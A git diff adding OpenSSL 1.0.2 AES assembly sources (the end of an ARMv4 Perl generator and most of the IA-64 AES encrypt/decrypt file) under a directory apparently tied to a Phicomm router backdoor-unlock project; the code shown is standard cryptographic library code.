+	and	$i3,lr,$s3		@ i2
+
+	add	$s3,$tbl,$s3,lsr#24
+	ldrb	$i3,[$tbl,$i3]		@ Td4[s3>>0]
+	ldrb	$s3,[$s3]		@ Td4[s3>>24]
+	eor	$s0,$s0,$i1,lsl#16
+	ldr	$i1,[$key,#0]
+	eor	$s1,$s1,$i2,lsl#8
+	ldr	$t1,[$key,#4]
+	eor	$s2,$i3,$s2,lsl#8
+	ldr	$t2,[$key,#8]
+	eor	$s3,$t3,$s3,lsl#24
+	ldr	$t3,[$key,#12]
+
+	eor	$s0,$s0,$i1
+	eor	$s1,$s1,$t1
+	eor	$s2,$s2,$t2
+	eor	$s3,$s3,$t3
+
+	sub	$tbl,$tbl,#1024
+	ldr	pc,[sp],#4		@ pop and return
+.size	_armv4_AES_decrypt,.-_armv4_AES_decrypt
+.asciz	"AES for ARMv4, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+___
+
+$code =~ s/\bbx\s+lr\b/.word\t0xe12fff1e/gm;	# make it possible to compile with -march=armv4
+$code =~ s/\bret\b/bx\tlr/gm;
+
+open SELF,$0;
+while(<SELF>) {
+	next if (/^#!/);
+	last if (!s/^#/@/ and !/^$/);
+	print;
+}
+close SELF;
+
+print $code;
+close STDOUT;	# enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ia64.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ia64.S
new file mode 100644
index 0000000..7f6c4c3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ia64.S
@@ -0,0 +1,1123 @@
+// ====================================================================
+// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+// project. Rights for redistribution and usage in source and binary
+// forms are granted according to the OpenSSL license.
+// ====================================================================
+//
+// What's wrong with compiler generated code? Compiler never uses
+// variable 'shr' which is pairable with 'extr'/'dep' instructions.
+// Then it uses 'zxt' which is an I-type, but can be replaced with
+// 'and' which in turn can be assigned to M-port [there're double as
+// much M-ports as there're I-ports on Itanium 2]. By sacrificing few
+// registers for small constants (255, 24 and 16) to be used with
+// 'shr' and 'and' instructions I can achieve better ILP, Intruction
+// Level Parallelism, and performance. This code outperforms GCC 3.3
+// generated code by over factor of 2 (two), GCC 3.4 - by 70% and
+// HP C - by 40%. Measured best-case scenario, i.e. aligned
+// big-endian input, ECB timing on Itanium 2 is (18 + 13*rounds)
+// ticks per block, or 9.25 CPU cycles per byte for 128 bit key.
+
+// Version 1.2 mitigates the hazard of cache-timing attacks by
+// a) compressing S-boxes from 8KB to 2KB+256B, b) scheduling
+// references to S-boxes for L2 cache latency, c) prefetching T[ed]4
+// prior last round. As result performance dropped to (26 + 15*rounds)
+// ticks per block or 11 cycles per byte processed with 128-bit key.
+// This is ~16% deterioration. For reference Itanium 2 L1 cache has
+// 64 bytes line size and L2 - 128 bytes...
+
+.ident	"aes-ia64.S, version 1.2"
+.ident	"IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
+.explicit
+.text
+
+rk0=r8;     rk1=r9;
+
+pfssave=r2;
+lcsave=r10;
+prsave=r3;
+maskff=r11;
+twenty4=r14;
+sixteen=r15;
+
+te00=r16;   te11=r17;   te22=r18;   te33=r19;
+te01=r20;   te12=r21;   te23=r22;   te30=r23;
+te02=r24;   te13=r25;   te20=r26;   te31=r27;
+te03=r28;   te10=r29;   te21=r30;   te32=r31;
+
+// these are rotating...
+t0=r32;     s0=r33;
+t1=r34;     s1=r35;
+t2=r36;     s2=r37;
+t3=r38;     s3=r39;
+
+te0=r40;    te1=r41;    te2=r42;    te3=r43;
+
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+# define ADDP	addp4
+#else
+# define ADDP	add
+#endif
+
+// Offsets from Te0
+#define TE0	0
+#define TE2	2
+#if defined(_HPUX_SOURCE) || defined(B_ENDIAN)
+#define TE1	3
+#define TE3	1
+#else
+#define TE1	1
+#define TE3	3
+#endif
+
+// This implies that AES_KEY comprises 32-bit key schedule elements
+// even on LP64 platforms.
+#ifndef	KSZ
+# define KSZ	4
+# define LDKEY	ld4
+#endif
+
+.proc	_ia64_AES_encrypt#
+// Input:	rk0-rk1
+//		te0
+//		te3	as AES_KEY->rounds!!!
+//		s0-s3
+//		maskff,twenty4,sixteen
+// Output:	r16,r20,r24,r28 as s0-s3
+// Clobber:	r16-r31,rk0-rk1,r32-r43
+.align	32
+_ia64_AES_encrypt:
+	.prologue
+	.altrp	b6
+	.body
+{ .mmi;	alloc	r16=ar.pfs,12,0,0,8
+	LDKEY	t0=[rk0],2*KSZ
+	mov	pr.rot=1<<16	}
+{ .mmi;	LDKEY	t1=[rk1],2*KSZ
+	add	te1=TE1,te0
+	add	te3=-3,te3	};;
+{ .mib;	LDKEY	t2=[rk0],2*KSZ
+	mov	ar.ec=2		}
+{ .mib;	LDKEY	t3=[rk1],2*KSZ
+	add	te2=TE2,te0
+	brp.loop.imp	.Le_top,.Le_end-16	};;
+
+{ .mmi;	xor	s0=s0,t0
+	xor	s1=s1,t1
+	mov	ar.lc=te3	}
+{ .mmi;	xor	s2=s2,t2
+	xor	s3=s3,t3
+	add	te3=TE3,te0	};;
+
+.align	32
+.Le_top:
+{ .mmi;	(p0)	LDKEY	t0=[rk0],2*KSZ		// 0/0:rk[0]
+	(p0)	and	te33=s3,maskff		// 0/0:s3&0xff
+	(p0)	extr.u	te22=s2,8,8	}	// 0/0:s2>>8&0xff
+{ .mmi; (p0)	LDKEY	t1=[rk1],2*KSZ		// 0/1:rk[1]
+	(p0)	and	te30=s0,maskff		// 0/1:s0&0xff
+	(p0)	shr.u	te00=s0,twenty4	};;	// 0/0:s0>>24
+{ .mmi;	(p0)	LDKEY	t2=[rk0],2*KSZ		// 1/2:rk[2]
+	(p0)	shladd	te33=te33,3,te3		// 1/0:te0+s0>>24
+	(p0)	extr.u	te23=s3,8,8	}	// 1/1:s3>>8&0xff
+{ .mmi;	(p0)	LDKEY	t3=[rk1],2*KSZ		// 1/3:rk[3]
+	(p0)	shladd	te30=te30,3,te3		// 1/1:te3+s0
+	(p0)	shr.u	te01=s1,twenty4	};;	// 1/1:s1>>24
+{ .mmi;	(p0)	ld4	te33=[te33]		// 2/0:te3[s3&0xff]
+	(p0)	shladd	te22=te22,3,te2		// 2/0:te2+s2>>8&0xff
+	(p0)	extr.u	te20=s0,8,8	}	// 2/2:s0>>8&0xff
+{ .mmi;	(p0)	ld4	te30=[te30]		// 2/1:te3[s0]
+	(p0)	shladd	te23=te23,3,te2		// 2/1:te2+s3>>8
+	(p0)	shr.u	te02=s2,twenty4	};;	// 2/2:s2>>24
+{ .mmi;	(p0)	ld4	te22=[te22]		// 3/0:te2[s2>>8]
+	(p0)	shladd	te20=te20,3,te2		// 3/2:te2+s0>>8
+	(p0)	extr.u	te21=s1,8,8	}	// 3/3:s1>>8&0xff
+{ .mmi;	(p0)	ld4	te23=[te23]		// 3/1:te2[s3>>8]
+	(p0)	shladd	te00=te00,3,te0		// 3/0:te0+s0>>24
+	(p0)	shr.u	te03=s3,twenty4	};;	// 3/3:s3>>24
+{ .mmi;	(p0)	ld4	te20=[te20]		// 4/2:te2[s0>>8]
+	(p0)	shladd	te21=te21,3,te2		// 4/3:te3+s2
+	(p0)	extr.u	te11=s1,16,8	}	// 4/0:s1>>16&0xff
+{ .mmi;	(p0)	ld4	te00=[te00]		// 4/0:te0[s0>>24]
+	(p0)	shladd	te01=te01,3,te0		// 4/1:te0+s1>>24
+	(p0)	shr.u	te13=s3,sixteen	};;	// 4/2:s3>>16
+{ .mmi;	(p0)	ld4	te21=[te21]		// 5/3:te2[s1>>8]
+	(p0)	shladd	te11=te11,3,te1		// 5/0:te1+s1>>16
+	(p0)	extr.u	te12=s2,16,8	}	// 5/1:s2>>16&0xff
+{ .mmi;	(p0)	ld4	te01=[te01]		// 5/1:te0[s1>>24]
+	(p0)	shladd	te02=te02,3,te0		// 5/2:te0+s2>>24
+	(p0)	and	te31=s1,maskff	};;	// 5/2:s1&0xff
+{ .mmi;	(p0)	ld4	te11=[te11]		// 6/0:te1[s1>>16]
+	(p0)	shladd	te12=te12,3,te1		// 6/1:te1+s2>>16
+	(p0)	extr.u	te10=s0,16,8	}	// 6/3:s0>>16&0xff
+{ .mmi;	(p0)	ld4	te02=[te02]		// 6/2:te0[s2>>24]
+	(p0)	shladd	te03=te03,3,te0		// 6/3:te1+s0>>16
+	(p0)	and	te32=s2,maskff	};;	// 6/3:s2&0xff
+
+{ .mmi;	(p0)	ld4	te12=[te12]		// 7/1:te1[s2>>16]
+	(p0)	shladd	te31=te31,3,te3		// 7/2:te3+s1&0xff
+	(p0)	and	te13=te13,maskff}	// 7/2:s3>>16&0xff
+{ .mmi;	(p0)	ld4	te03=[te03]		// 7/3:te0[s3>>24]
+	(p0)	shladd	te32=te32,3,te3		// 7/3:te3+s2
+	(p0)	xor	t0=t0,te33	};;	// 7/0:
+{ .mmi;	(p0)	ld4	te31=[te31]		// 8/2:te3[s1]
+	(p0)	shladd	te13=te13,3,te1		// 8/2:te1+s3>>16
+	(p0)	xor	t0=t0,te22	}	// 8/0:
+{ .mmi;	(p0)	ld4	te32=[te32]		// 8/3:te3[s2]
+	(p0)	shladd	te10=te10,3,te1		// 8/3:te1+s0>>16
+	(p0)	xor	t1=t1,te30	};;	// 8/1:
+{ .mmi;	(p0)	ld4	te13=[te13]		// 9/2:te1[s3>>16]
+	(p0)	ld4	te10=[te10]		// 9/3:te1[s0>>16]
+	(p0)	xor	t0=t0,te00	};;	// 9/0:		!L2 scheduling
+{ .mmi;	(p0)	xor	t1=t1,te23		// 10[9]/1:	
+	(p0)	xor	t2=t2,te20		// 10[9]/2:
+	(p0)	xor	t3=t3,te21	};;	// 10[9]/3:
+{ .mmi;	(p0)	xor	t0=t0,te11		// 11[10]/0:done!
+	(p0)	xor	t1=t1,te01		// 11[10]/1:
+	(p0)	xor	t2=t2,te02	};;	// 11[10]/2:	!L2 scheduling
+{ .mmi;	(p0)	xor	t3=t3,te03		// 12[10]/3:
+	(p16)	cmp.eq	p0,p17=r0,r0 	};;	// 12[10]/clear (p17)
+{ .mmi;	(p0)	xor	t1=t1,te12		// 13[11]/1:done!
+	(p0)	xor	t2=t2,te31		// 13[11]/2:
+	(p0)	xor	t3=t3,te32	}	// 13[11]/3:
+{ .mmi;	(p17)	add	te0=2048,te0		// 13[11]/
+	(p17)	add	te1=2048+64-TE1,te1};;	// 13[11]/
+{ .mib;	(p0)	xor	t2=t2,te13		// 14[12]/2:done!
+	(p17)	add	te2=2048+128-TE2,te2}	// 14[12]/
+{ .mib;	(p0)	xor	t3=t3,te10		// 14[12]/3:done!
+	(p17)	add	te3=2048+192-TE3,te3	// 14[12]/
+	br.ctop.sptk	.Le_top		};;
+.Le_end:
+
+
+{ .mmi;	ld8	te12=[te0]		// prefetch Te4
+	ld8	te31=[te1]	}
+{ .mmi;	ld8	te10=[te2]
+	ld8	te32=[te3]	}
+
+{ .mmi;	LDKEY	t0=[rk0],2*KSZ		// 0/0:rk[0]
+	and	te33=s3,maskff		// 0/0:s3&0xff
+	extr.u	te22=s2,8,8	}	// 0/0:s2>>8&0xff
+{ .mmi; LDKEY	t1=[rk1],2*KSZ		// 0/1:rk[1]
+	and	te30=s0,maskff		// 0/1:s0&0xff
+	shr.u	te00=s0,twenty4	};;	// 0/0:s0>>24
+{ .mmi;	LDKEY	t2=[rk0],2*KSZ		// 1/2:rk[2]
+	add	te33=te33,te0		// 1/0:te0+s0>>24
+	extr.u	te23=s3,8,8	}	// 1/1:s3>>8&0xff
+{ .mmi;	LDKEY	t3=[rk1],2*KSZ		// 1/3:rk[3]
+	add	te30=te30,te0		// 1/1:te0+s0
+	shr.u	te01=s1,twenty4	};;	// 1/1:s1>>24
+{ .mmi;	ld1	te33=[te33]		// 2/0:te0[s3&0xff]
+	add	te22=te22,te0		// 2/0:te0+s2>>8&0xff
+	extr.u	te20=s0,8,8	}	// 2/2:s0>>8&0xff
+{ .mmi;	ld1	te30=[te30]		// 2/1:te0[s0]
+	add	te23=te23,te0		// 2/1:te0+s3>>8
+	shr.u	te02=s2,twenty4	};;	// 2/2:s2>>24
+{ .mmi;	ld1	te22=[te22]		// 3/0:te0[s2>>8]
+	add	te20=te20,te0		// 3/2:te0+s0>>8
+	extr.u	te21=s1,8,8	}	// 3/3:s1>>8&0xff
+{ .mmi;	ld1	te23=[te23]		// 3/1:te0[s3>>8]
+	add	te00=te00,te0		// 3/0:te0+s0>>24
+	shr.u	te03=s3,twenty4	};;	// 3/3:s3>>24
+{ .mmi;	ld1	te20=[te20]		// 4/2:te0[s0>>8]
+	add	te21=te21,te0		// 4/3:te0+s2
+	extr.u	te11=s1,16,8	}	// 4/0:s1>>16&0xff
+{ .mmi;	ld1	te00=[te00]		// 4/0:te0[s0>>24]
+	add	te01=te01,te0		// 4/1:te0+s1>>24
+	shr.u	te13=s3,sixteen	};;	// 4/2:s3>>16
+{ .mmi;	ld1	te21=[te21]		// 5/3:te0[s1>>8]
+	add	te11=te11,te0		// 5/0:te0+s1>>16
+	extr.u	te12=s2,16,8	}	// 5/1:s2>>16&0xff
+{ .mmi;	ld1	te01=[te01]		// 5/1:te0[s1>>24]
+	add	te02=te02,te0		// 5/2:te0+s2>>24
+	and	te31=s1,maskff	};;	// 5/2:s1&0xff
+{ .mmi;	ld1	te11=[te11]		// 6/0:te0[s1>>16]
+	add	te12=te12,te0		// 6/1:te0+s2>>16
+	extr.u	te10=s0,16,8	}	// 6/3:s0>>16&0xff
+{ .mmi;	ld1	te02=[te02]		// 6/2:te0[s2>>24]
+	add	te03=te03,te0		// 6/3:te0+s0>>16
+	and	te32=s2,maskff	};;	// 6/3:s2&0xff
+
+{ .mmi;	ld1	te12=[te12]		// 7/1:te0[s2>>16]
+	add	te31=te31,te0		// 7/2:te0+s1&0xff
+	dep	te33=te22,te33,8,8}	// 7/0:
+{ .mmi;	ld1	te03=[te03]		// 7/3:te0[s3>>24]
+	add	te32=te32,te0		// 7/3:te0+s2
+	and	te13=te13,maskff};;	// 7/2:s3>>16&0xff
+{ .mmi;	ld1	te31=[te31]		// 8/2:te0[s1]
+	add	te13=te13,te0		// 8/2:te0+s3>>16
+	dep	te30=te23,te30,8,8}	// 8/1:
+{ .mmi;	ld1	te32=[te32]		// 8/3:te0[s2]
+	add	te10=te10,te0		// 8/3:te0+s0>>16
+	shl	te00=te00,twenty4};;	// 8/0:
+{ .mii;	ld1	te13=[te13]		// 9/2:te0[s3>>16]
+	dep	te33=te11,te33,16,8	// 9/0:
+	shl	te01=te01,twenty4};;	// 9/1:
+{ .mii;	ld1	te10=[te10]		// 10/3:te0[s0>>16]
+	dep	te31=te20,te31,8,8	// 10/2:
+	shl	te02=te02,twenty4};;	// 10/2:
+{ .mii;	xor	t0=t0,te33		// 11/0:
+	dep	te32=te21,te32,8,8	// 11/3:
+	shl	te12=te12,sixteen};;	// 11/1:
+{ .mii;	xor	r16=t0,te00		// 12/0:done!
+	dep	te31=te13,te31,16,8	// 12/2:
+	shl	te03=te03,twenty4};;	// 12/3:
+{ .mmi;	xor	t1=t1,te01		// 13/1:
+	xor	t2=t2,te02		// 13/2:
+	dep	te32=te10,te32,16,8};;	// 13/3:
+{ .mmi;	xor	t1=t1,te30		// 14/1:
+	xor	r24=t2,te31		// 14/2:done!
+	xor	t3=t3,te32	};;	// 14/3:
+{ .mib;	xor	r20=t1,te12		// 15/1:done!
+	xor	r28=t3,te03		// 15/3:done!
+	br.ret.sptk	b6	};;
+.endp	_ia64_AES_encrypt#
+
+// void AES_encrypt (const void *in,void *out,const AES_KEY *key);
+.global	AES_encrypt#
+.proc	AES_encrypt#
+.align	32
+AES_encrypt:
+	.prologue
+	.save	ar.pfs,pfssave
+{ .mmi;	alloc	pfssave=ar.pfs,3,1,12,0
+	and	out0=3,in0
+	mov	r3=ip			}
+{ .mmi;	ADDP	in0=0,in0
+	mov	loc0=psr.um
+	ADDP	out11=KSZ*60,in2	};;	// &AES_KEY->rounds
+
+{ .mmi;	ld4	out11=[out11]			// AES_KEY->rounds
+	add	out8=(AES_Te#-AES_encrypt#),r3	// Te0
+	.save	pr,prsave
+	mov	prsave=pr		}
+{ .mmi;	rum	1<<3				// clear um.ac
+	.save	ar.lc,lcsave
+	mov	lcsave=ar.lc		};;
+
+	.body
+#if defined(_HPUX_SOURCE)	// HPUX is big-endian, cut 15+15 cycles...
+{ .mib; cmp.ne	p6,p0=out0,r0
+	add	out0=4,in0
+(p6)	br.dpnt.many	.Le_i_unaligned	};;
+
+{ .mmi;	ld4	out1=[in0],8		// s0
+	and	out9=3,in1
+	mov	twenty4=24		}
+{ .mmi;	ld4	out3=[out0],8		// s1
+	ADDP	rk0=0,in2
+	mov	sixteen=16		};;
+{ .mmi;	ld4	out5=[in0]		// s2
+	cmp.ne	p6,p0=out9,r0
+	mov	maskff=0xff		}
+{ .mmb;	ld4	out7=[out0]		// s3
+	ADDP	rk1=KSZ,in2
+	br.call.sptk.many	b6=_ia64_AES_encrypt	};;
+
+{ .mib;	ADDP	in0=4,in1
+	ADDP	in1=0,in1
+(p6)	br.spnt	.Le_o_unaligned		};;
+
+{ .mii;	mov	psr.um=loc0
+	mov	ar.pfs=pfssave
+	mov	ar.lc=lcsave		};;
+{ .mmi;	st4	[in1]=r16,8		// s0
+	st4	[in0]=r20,8		// s1
+	mov	pr=prsave,0x1ffff	};;
+{ .mmb;	st4	[in1]=r24		// s2
+	st4	[in0]=r28		// s3
+	br.ret.sptk.many	b0	};;
+#endif
+
+.align	32
+.Le_i_unaligned:
+{ .mmi;	add	out0=1,in0
+	add	out2=2,in0
+	add	out4=3,in0	};;
+{ .mmi;	ld1	r16=[in0],4
+	ld1	r17=[out0],4	}//;;
+{ .mmi;	ld1	r18=[out2],4
+	ld1	out1=[out4],4	};;	// s0
+{ .mmi;	ld1	r20=[in0],4
+	ld1	r21=[out0],4	}//;;
+{ .mmi;	ld1	r22=[out2],4
+	ld1	out3=[out4],4	};;	// s1
+{ .mmi;	ld1	r24=[in0],4
+	ld1	r25=[out0],4	}//;;
+{ .mmi;	ld1	r26=[out2],4
+	ld1	out5=[out4],4	};;	// s2
+{ .mmi;	ld1	r28=[in0]
+	ld1	r29=[out0]	}//;;
+{ .mmi;	ld1	r30=[out2]
+	ld1	out7=[out4]	};;	// s3
+
+{ .mii;
+	dep	out1=r16,out1,24,8	//;;
+	dep	out3=r20,out3,24,8	}//;;
+{ .mii;	ADDP	rk0=0,in2
+	dep	out5=r24,out5,24,8	//;;
+	dep	out7=r28,out7,24,8	};;
+{ .mii;	ADDP	rk1=KSZ,in2
+	dep	out1=r17,out1,16,8	//;;
+	dep	out3=r21,out3,16,8	}//;;
+{ .mii;	mov	twenty4=24
+	dep	out5=r25,out5,16,8	//;;
+	dep	out7=r29,out7,16,8	};;
+{ .mii;	mov	sixteen=16
+	dep	out1=r18,out1,8,8	//;;
+	dep	out3=r22,out3,8,8	}//;;
+{ .mii;	mov	maskff=0xff
+	dep	out5=r26,out5,8,8	//;;
+	dep	out7=r30,out7,8,8	};;
+
+{ .mib;	br.call.sptk.many	b6=_ia64_AES_encrypt	};;
+
+.Le_o_unaligned:
+{ .mii;	ADDP	out0=0,in1
+	extr.u	r17=r16,8,8			// s0
+	shr.u	r19=r16,twenty4		}//;;
+{ .mii;	ADDP	out1=1,in1
+	extr.u	r18=r16,16,8
+	shr.u	r23=r20,twenty4		}//;;	// s1
+{ .mii;	ADDP	out2=2,in1
+	extr.u	r21=r20,8,8
+	shr.u	r22=r20,sixteen		}//;;
+{ .mii;	ADDP	out3=3,in1
+	extr.u	r25=r24,8,8			// s2
+	shr.u	r27=r24,twenty4		};;
+{ .mii;	st1	[out3]=r16,4
+	extr.u	r26=r24,16,8
+	shr.u	r31=r28,twenty4		}//;;	// s3
+{ .mii;	st1	[out2]=r17,4
+	extr.u	r29=r28,8,8
+	shr.u	r30=r28,sixteen		}//;;
+
+{ .mmi;	st1	[out1]=r18,4
+	st1	[out0]=r19,4		};;
+{ .mmi;	st1	[out3]=r20,4
+	st1	[out2]=r21,4		}//;;
+{ .mmi;	st1	[out1]=r22,4
+	st1	[out0]=r23,4		};;
+{ .mmi;	st1	[out3]=r24,4
+	st1	[out2]=r25,4
+	mov	pr=prsave,0x1ffff	}//;;
+{ .mmi;	st1	[out1]=r26,4
+	st1	[out0]=r27,4
+	mov	ar.pfs=pfssave		};;
+{ .mmi;	st1	[out3]=r28
+	st1	[out2]=r29
+	mov	ar.lc=lcsave		}//;;
+{ .mmi;	st1	[out1]=r30
+	st1	[out0]=r31		}
+{ .mfb;	mov	psr.um=loc0			// restore user mask
+	br.ret.sptk.many	b0	};;
+.endp	AES_encrypt#
+
+// *AES_decrypt are autogenerated by the following script:
+#if 0
+#!/usr/bin/env perl
+print "// *AES_decrypt are autogenerated by the following script:\n#if 0\n";
+open(PROG,'<'.$0); while(<PROG>) { print; } close(PROG);
+print "#endif\n";
+while(<>) {
+	$process=1	if (/\.proc\s+_ia64_AES_encrypt/);
+	next		if (!$process);
+
+	#s/te00=s0/td00=s0/;	s/te00/td00/g;
+	s/te11=s1/td13=s3/;	s/te11/td13/g;
+	#s/te22=s2/td22=s2/;	s/te22/td22/g;
+	s/te33=s3/td31=s1/;	s/te33/td31/g;
+
+	#s/te01=s1/td01=s1/;	s/te01/td01/g;
+	s/te12=s2/td10=s0/;	s/te12/td10/g;
+	#s/te23=s3/td23=s3/;	s/te23/td23/g;
+	s/te30=s0/td32=s2/;	s/te30/td32/g;
+
+	#s/te02=s2/td02=s2/;	s/te02/td02/g;
+	s/te13=s3/td11=s1/;	s/te13/td11/g;
+	#s/te20=s0/td20=s0/;	s/te20/td20/g;
+	s/te31=s1/td33=s3/;	s/te31/td33/g;
+
+	#s/te03=s3/td03=s3/;	s/te03/td03/g;
+	s/te10=s0/td12=s2/;	s/te10/td12/g;
+	#s/te21=s1/td21=s1/;	s/te21/td21/g;
+	s/te32=s2/td30=s0/;	s/te32/td30/g;
+
+	s/td/te/g;
+
+	s/AES_encrypt/AES_decrypt/g;
+	s/\.Le_/.Ld_/g;
+	s/AES_Te#/AES_Td#/g;
+
+	print;
+
+	exit		if (/\.endp\s+AES_decrypt/);
+}
+#endif
+.proc	_ia64_AES_decrypt#
+// Input:	rk0-rk1
+//		te0
+//		te3	as AES_KEY->rounds!!!
+//		s0-s3
+//		maskff,twenty4,sixteen
+// Output:	r16,r20,r24,r28 as s0-s3
+// Clobber:	r16-r31,rk0-rk1,r32-r43
+.align	32
+_ia64_AES_decrypt:
+	.prologue
+	.altrp	b6
+	.body
+{ .mmi;	alloc	r16=ar.pfs,12,0,0,8
+	LDKEY	t0=[rk0],2*KSZ
+	mov	pr.rot=1<<16	}
+{ .mmi;	LDKEY	t1=[rk1],2*KSZ
+	add	te1=TE1,te0
+	add	te3=-3,te3	};;
+{ .mib;	LDKEY	t2=[rk0],2*KSZ
+	mov	ar.ec=2		}
+{ .mib;	LDKEY	t3=[rk1],2*KSZ
+	add	te2=TE2,te0
+	brp.loop.imp	.Ld_top,.Ld_end-16	};;
+
+{ .mmi;	xor	s0=s0,t0
+	xor	s1=s1,t1
+	mov	ar.lc=te3	}
+{ .mmi;	xor	s2=s2,t2
+	xor	s3=s3,t3
+	add	te3=TE3,te0	};;
+
+.align	32
+.Ld_top:
+{ .mmi;	(p0)	LDKEY	t0=[rk0],2*KSZ		// 0/0:rk[0]
+	(p0)	and	te31=s1,maskff		// 0/0:s3&0xff
+	(p0)	extr.u	te22=s2,8,8	}	// 0/0:s2>>8&0xff
+{ .mmi; (p0)	LDKEY	t1=[rk1],2*KSZ		// 0/1:rk[1]
+	(p0)	and	te32=s2,maskff		// 0/1:s0&0xff
+	(p0)	shr.u	te00=s0,twenty4	};;	// 0/0:s0>>24
+{ .mmi;	(p0)	LDKEY	t2=[rk0],2*KSZ		// 1/2:rk[2]
+	(p0)	shladd	te31=te31,3,te3		// 1/0:te0+s0>>24
+	(p0)	extr.u	te23=s3,8,8	}	// 1/1:s3>>8&0xff
+{ .mmi;	(p0)	LDKEY	t3=[rk1],2*KSZ		// 1/3:rk[3]
+	(p0)	shladd	te32=te32,3,te3		// 1/1:te3+s0
+	(p0)	shr.u	te01=s1,twenty4	};;	// 1/1:s1>>24
+{ .mmi;	(p0)	ld4	te31=[te31]		// 2/0:te3[s3&0xff]
+	(p0)	shladd	te22=te22,3,te2		// 2/0:te2+s2>>8&0xff
+	(p0)	extr.u	te20=s0,8,8	}	// 2/2:s0>>8&0xff
+{ .mmi;	(p0)	ld4	te32=[te32]		// 2/1:te3[s0]
+	(p0)	shladd	te23=te23,3,te2		// 2/1:te2+s3>>8
+	(p0)	shr.u	te02=s2,twenty4	};;	// 2/2:s2>>24
+{ .mmi;	(p0)	ld4	te22=[te22]		// 3/0:te2[s2>>8]
+	(p0)	shladd	te20=te20,3,te2		// 3/2:te2+s0>>8
+	(p0)	extr.u	te21=s1,8,8	}	// 3/3:s1>>8&0xff
+{ .mmi;	(p0)	ld4	te23=[te23]		// 3/1:te2[s3>>8]
+	(p0)	shladd	te00=te00,3,te0		// 3/0:te0+s0>>24
+	(p0)	shr.u	te03=s3,twenty4	};;	// 3/3:s3>>24
+{ .mmi;	(p0)	ld4	te20=[te20]		// 4/2:te2[s0>>8]
+	(p0)	shladd	te21=te21,3,te2		// 4/3:te3+s2
+	(p0)	extr.u	te13=s3,16,8	}	// 4/0:s1>>16&0xff
+{ .mmi;	(p0)	ld4	te00=[te00]		// 4/0:te0[s0>>24]
+	(p0)	shladd	te01=te01,3,te0		// 4/1:te0+s1>>24
+	(p0)	shr.u	te11=s1,sixteen	};;	// 4/2:s3>>16
+{ .mmi;	(p0)	ld4	te21=[te21]		// 5/3:te2[s1>>8]
+	(p0)	shladd	te13=te13,3,te1		// 5/0:te1+s1>>16
+	(p0)	extr.u	te10=s0,16,8	}	// 5/1:s2>>16&0xff
+{ .mmi;	(p0)	ld4	te01=[te01]		// 5/1:te0[s1>>24]
+	(p0)	shladd	te02=te02,3,te0		// 5/2:te0+s2>>24
+	(p0)	and	te33=s3,maskff	};;	// 5/2:s1&0xff
+{ .mmi;	(p0)	ld4	te13=[te13]		// 6/0:te1[s1>>16]
+	(p0)	shladd	te10=te10,3,te1		// 6/1:te1+s2>>16
+	(p0)	extr.u	te12=s2,16,8	}	// 6/3:s0>>16&0xff
+{ .mmi;	(p0)	ld4	te02=[te02]		// 6/2:te0[s2>>24]
+	(p0)	shladd	te03=te03,3,te0		// 6/3:te1+s0>>16
+	(p0)	and	te30=s0,maskff	};;	// 6/3:s2&0xff
+
+{ .mmi;	(p0)	ld4	te10=[te10]		// 7/1:te1[s2>>16]
+	(p0)	shladd	te33=te33,3,te3		// 7/2:te3+s1&0xff
+	(p0)	and	te11=te11,maskff}	// 7/2:s3>>16&0xff
+{ .mmi;	(p0)	ld4	te03=[te03]		// 7/3:te0[s3>>24]
+	(p0)	shladd	te30=te30,3,te3		// 7/3:te3+s2
+	(p0)	xor	t0=t0,te31	};;	// 7/0:
+{ .mmi;	(p0)	ld4	te33=[te33]		// 8/2:te3[s1]
+	(p0)	shladd	te11=te11,3,te1		// 8/2:te1+s3>>16
+	(p0)	xor	t0=t0,te22	}	// 8/0:
+{ .mmi;	(p0)	ld4	te30=[te30]		// 8/3:te3[s2]
+	(p0)	shladd	te12=te12,3,te1		// 8/3:te1+s0>>16
+	(p0)	xor	t1=t1,te32	};;	// 8/1:
+{ .mmi;	(p0)	ld4	te11=[te11]		// 9/2:te1[s3>>16]
+	(p0)	ld4	te12=[te12]		// 9/3:te1[s0>>16]
+	(p0)	xor	t0=t0,te00	};;	// 9/0:		!L2 scheduling
+{ .mmi;	(p0)	xor	t1=t1,te23		// 10[9]/1:	
+	(p0)	xor	t2=t2,te20		// 10[9]/2:
+	(p0)	xor	t3=t3,te21	};;	// 10[9]/3:
+{ .mmi;	(p0)	xor	t0=t0,te13		// 11[10]/0:done!
+	(p0)	xor	t1=t1,te01		// 11[10]/1:
+	(p0)	xor	t2=t2,te02	};;	// 11[10]/2:	!L2 scheduling
+{ .mmi;	(p0)	xor	t3=t3,te03		// 12[10]/3:
+	(p16)	cmp.eq	p0,p17=r0,r0 	};;	// 12[10]/clear (p17)
+{ .mmi;	(p0)	xor	t1=t1,te10		// 13[11]/1:done!
+	(p0)	xor	t2=t2,te33		// 13[11]/2:
+	(p0)	xor	t3=t3,te30	}	// 13[11]/3:
+{ .mmi;	(p17)	add	te0=2048,te0		// 13[11]/
+	(p17)	add	te1=2048+64-TE1,te1};;	// 13[11]/
+{ .mib;	(p0)	xor	t2=t2,te11		// 14[12]/2:done!
+	(p17)	add	te2=2048+128-TE2,te2}	// 14[12]/
+{ .mib;	(p0)	xor	t3=t3,te12		// 14[12]/3:done!
+	(p17)	add	te3=2048+192-TE3,te3	// 14[12]/
+	br.ctop.sptk	.Ld_top		};;
+.Ld_end:
+
+
+{ .mmi;	ld8	te10=[te0]		// prefetch Td4
+	ld8	te33=[te1]	}
+{ .mmi;	ld8	te12=[te2]
+	ld8	te30=[te3]	}
+
+{ .mmi;	LDKEY	t0=[rk0],2*KSZ		// 0/0:rk[0]
+	and	te31=s1,maskff		// 0/0:s3&0xff
+	extr.u	te22=s2,8,8	}	// 0/0:s2>>8&0xff
+{ .mmi; LDKEY	t1=[rk1],2*KSZ		// 0/1:rk[1]
+	and	te32=s2,maskff		// 0/1:s0&0xff
+	shr.u	te00=s0,twenty4	};;	// 0/0:s0>>24
